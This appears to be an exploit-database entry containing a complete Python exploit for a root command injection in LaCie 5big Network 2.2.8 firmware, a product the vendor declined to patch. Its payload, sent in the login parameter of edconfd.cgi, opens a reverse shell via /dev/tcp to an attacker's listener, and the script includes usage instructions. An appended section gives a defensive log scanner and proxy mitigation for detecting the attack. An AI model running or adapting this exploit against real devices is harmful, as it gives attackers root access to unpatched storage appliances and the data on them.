LaCie 5big Network 2.2.8 - Command Injection
Source: ${lastname}@tyntec.com  Author: Sablowski  Published: 2017-12-07
#!/usr/bin/python
 
# Exploit Title: LaCie 5big Network 2.2.8 Command Injection
# Date: 2017-12-04
# Exploit Author: Timo Sablowski
# Contact: ${lastname}@tyntec.com
# Vendor Homepage: http://www.lacie.com
# Software Link: http://www.lacie.com/files/lacie-content/download/drivers/5%20Big%20Network.zip
# Version: 2.2.8
# Tested on: Linux
# Platform: Hardware
#
# Command Injection Vulnerability (with root privileges) in LaCie's
# 5big Network appliance running firmware version 2.2.8.
# Just open a netcat listener and run this script to receive a reverse
# shell to exploit the vulnerability.
#
# This exploit has been released to Seagate in accordance with their
# responsible disclosure program and is meant to be used for testing
# and educational purposes only.
# Please do not use it against any system without prior permission.
# Use at your own risk.
#
# Timeline:
#   2017-09-13: Discovery
#   2017-10-04: Reporting to Seagate
#       asking to fix the issue until 2017-12-04
#   2017-11-07: Seagate stating to not fix the vulnerability as the
#       product has been EOL for a long time
 
 
import sys, getopt, os, urllib
 
url_addition = "/cgi-bin/public/edconfd.cgi?method=getChallenge&login="
blank_payload = "admin|#' ||`/bin/sh -i > /dev/tcp/IP/PORT 0<&1 2>&1` #\\\""
 
def help():
    print "Usage:"
    print "%s -u <baseurl> -l <listener> -p <port>" %os.path.basename(sys.argv[0])
    print ""
    print "<baseurl> identifies the target's URL, e.g. http://10.0.0.1:8080"
    print "<listener> sets the IP where the attacked system connects back to"
    print "<port> defines the listening port"
    print ""
    print "Example: attack LaCie system to connect back to a remote machine (do not forget to open a netcat session)"
    print "\t %s -u http://10.0.0.1 -l 192.168.0.1 -p 4444" %os.path.basename(sys.argv[0])
 
 
def create_payload(blank_payload, listener, port):
    print "[+] Generating payload with IP %s and port %s" %(listener, str(port))
    payload = blank_payload.replace("IP", listener).replace("PORT", str(port))
    payload = urllib.quote(payload, safe='')
    return payload
 
 
def send_payload(injected_url):
    print "[+] Sending payload, this might take a few seconds ..."
    print "[+] Check your listener"
    try:
        urllib.urlopen(injected_url)
    except:
        raise
 
 
def main():
    try:
        opts, args = getopt.getopt(sys.argv[1:],"hu:l:p:")
    except:
        help()
        sys.exit(1)
    for opt, arg in opts:
        if opt == '-h':
            help()
            sys.exit()
        elif opt in ("-u"):
            url = arg
        elif opt in ("-l"):
            listener = arg
        elif opt in ("-p"):
            port = int(arg)
    try:
        url
        listener
        port
    except:
        help()
        sys.exit(1)
 
    payload = create_payload(blank_payload, listener, port)
    injected_url = "%s%s%s" %(url, url_addition, payload)
    send_payload(injected_url)
 
 
 
if __name__ == "__main__":
    main()
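
Because the timeline above says the vendor will not patch this end-of-life product, detection has to happen in front of the device. The following is an added example, not part of the original exploit or any vendor code: it scans web access logs for `getChallenge` requests to `edconfd.cgi` whose `login` value, once URL-decoded, contains anything other than plain user-name characters. The combined log format, the allowed character set, and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: a reverse proxy in front of the NAS writes combined-format logs.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
ENDPOINT = "/cgi-bin/public/edconfd.cgi"   # path taken from the script above
# Assumption: legitimate login names use only these characters.
SAFE_LOGIN = re.compile(r"[A-Za-z0-9._@-]{1,64}")


def suspicious_login(line):
    """Return the decoded login value if the request is anomalous, else None."""
    match = REQUEST_RE.search(line)
    if not match:
        return None
    parts = urlsplit(match.group(1))
    if not parts.path.endswith(ENDPOINT):
        return None
    # parse_qs percent-decodes values, so fully encoded input is inspected in clear.
    query = parse_qs(parts.query, keep_blank_values=True)
    if "getChallenge" not in query.get("method", []):
        return None
    for value in query.get("login", []):
        if not SAFE_LOGIN.fullmatch(value):
            return value
    return None


def scan(lines):
    """Return (line_number, decoded_login) for every flagged log line."""
    hits = []
    for number, line in enumerate(lines, 1):
        value = suspicious_login(line)
        if value is not None:
            hits.append((number, value))
    return hits


# Constructed sample log lines (documentation addresses, placeholder command).
SAMPLE_LOG = [
    '192.0.2.10 - - [07/Dec/2017:10:00:01 +0000] "GET /cgi-bin/public/edconfd.cgi'
    '?method=getChallenge&login=admin HTTP/1.1" 200 64',
    '192.0.2.44 - - [07/Dec/2017:10:00:09 +0000] "GET /cgi-bin/public/edconfd.cgi'
    '?method=getChallenge&login=admin%7C%23%27%20%7C%7C%60PLACEHOLDER%60 HTTP/1.1" 200 0',
    '192.0.2.10 - - [07/Dec/2017:10:00:12 +0000] "GET /index.html HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for number, value in scan(SAMPLE_LOG):
        print("line %d: unexpected login value %r" % (number, value))
```

The same allow-list can be enforced as a blocking rule on the proxy, which is the practical mitigation when the management interface cannot be taken off the network.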
 